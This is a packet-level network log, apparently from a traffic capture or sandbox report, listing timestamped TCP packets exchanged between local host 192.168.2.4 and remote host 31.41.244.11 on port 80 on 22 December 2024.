Dec 22, 2024 02:16:14.378902912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.378952026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.379020929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.379056931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.379101992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.379793882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.379836082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.379904032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.379940033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.379981995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.380692959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.380738020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.380805016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.380841017 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.380886078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.381560087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.381686926 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.381689072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.381726027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.381771088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.382443905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.382539034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.382549047 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.382586002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.382635117 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.382663012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.389199018 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.389270067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.389307022 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.389317036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.389344931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.389347076 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.389383078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.389420033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.389429092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.389738083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.390131950 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.390181065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.390229940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.546531916 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.546578884 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.546597004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.546622038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.546622992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.546663046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.547260046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.547318935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.547342062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.547964096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.549840927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.549877882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.549889088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.549915075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.549936056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.549954891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.549957037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550012112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550014973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550048113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550084114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550096989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550120115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550157070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550162077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550218105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550561905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550611019 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550920963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550957918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.550983906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.550996065 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.551614046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.551829100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.551865101 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.551878929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.551911116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.552370071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.552414894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.552560091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.552597046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.552604914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.552680969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.553477049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.553510904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.553535938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.553548098 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.553559065 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.553595066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.554187059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.554239988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.554385900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.554420948 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.554471016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.555121899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.555181980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.555298090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.555358887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.555408001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.555855989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.555907965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.556195021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.556231976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.556245089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.556322098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.556912899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.556967020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.557018042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.557068110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.557173014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.557805061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.557840109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.557876110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.557888031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.558012962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.558696985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.558733940 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.558747053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.558770895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.558777094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.558816910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.559585094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.559619904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.559655905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.559663057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.559684038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.559701920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.560311079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.560517073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.560518980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.560563087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.560570002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.560601950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.561398029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.561434031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.561445951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.561470985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.561494112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.561513901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.562139988 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.562319994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.562324047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.562356949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.562366962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.562467098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.563035011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.563097954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.563195944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.563234091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.563244104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.563783884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.563961029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.564014912 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.564117908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.564155102 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.564201117 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.564811945 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.564927101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.565009117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.565045118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.565058947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.565092087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.565709114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.565821886 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.565888882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.565927029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.565934896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.565963030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.566632986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.566678047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.566800117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.566834927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.566857100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.566883087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.567516088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.567569971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.567864895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.567898989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.567913055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.567935944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.567938089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.567984104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.568775892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.568811893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.568820000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.568849087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.568854094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.568893909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.569669962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.569705963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.569716930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.569744110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.569775105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.569788933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.570533991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.570569038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.570583105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.570606947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.570615053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.570651054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.571238995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.571289062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.571407080 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.571444035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.571475029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.571491957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.572429895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.572464943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.572479010 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.572501898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.572514057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.572544098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.573137999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.573259115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.573327065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.573364019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.573371887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.573517084 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.574057102 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.574091911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.574099064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.574166059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.574213982 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.574275017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.574928999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.574965000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.574981928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.575001001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.575007915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.575047970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.575782061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.575823069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.575841904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.575906038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.581780910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.581835032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.581877947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.581885099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.582010984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.582021952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.582524061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.582578897 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.582580090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.583039045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.583086967 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.738765955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.738912106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.738949060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.739036083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.739078045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.739119053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.739197016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.739197016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.740119934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.740165949 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.740174055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.740191936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.740214109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.740219116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.740264893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.740964890 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.741020918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.741024017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.741064072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.741064072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.741112947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.741619110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.741671085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.741744041 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.741780996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.741795063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.742018938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.742499113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.742547989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.742615938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.742650032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.742661953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.742701054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.743387938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.743437052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.743500948 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.743536949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.743551970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.743582010 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.744277954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.744328022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.744398117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.744434118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.744450092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.744478941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.745204926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.745255947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.745356083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.745390892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.745400906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.745435953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.746052027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.746176958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.746229887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.746231079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.746917963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.746964931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.747049093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.747085094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.747137070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.747839928 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.747901917 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.747955084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.747991085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.748034000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.748786926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.748898029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.748949051 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.748951912 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.748995066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.749643087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.749758005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.749792099 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.749810934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.749842882 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.750505924 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.750629902 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.750663996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.750679970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.750705004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.751380920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.751427889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.751502037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.751537085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.751548052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.752294064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.752341986 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.752413034 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.752449036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.752506971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.753181934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.753226042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.753304958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.753340960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.753387928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.754055977 CET	80	49765	31.41.244.11	192.168.2.4
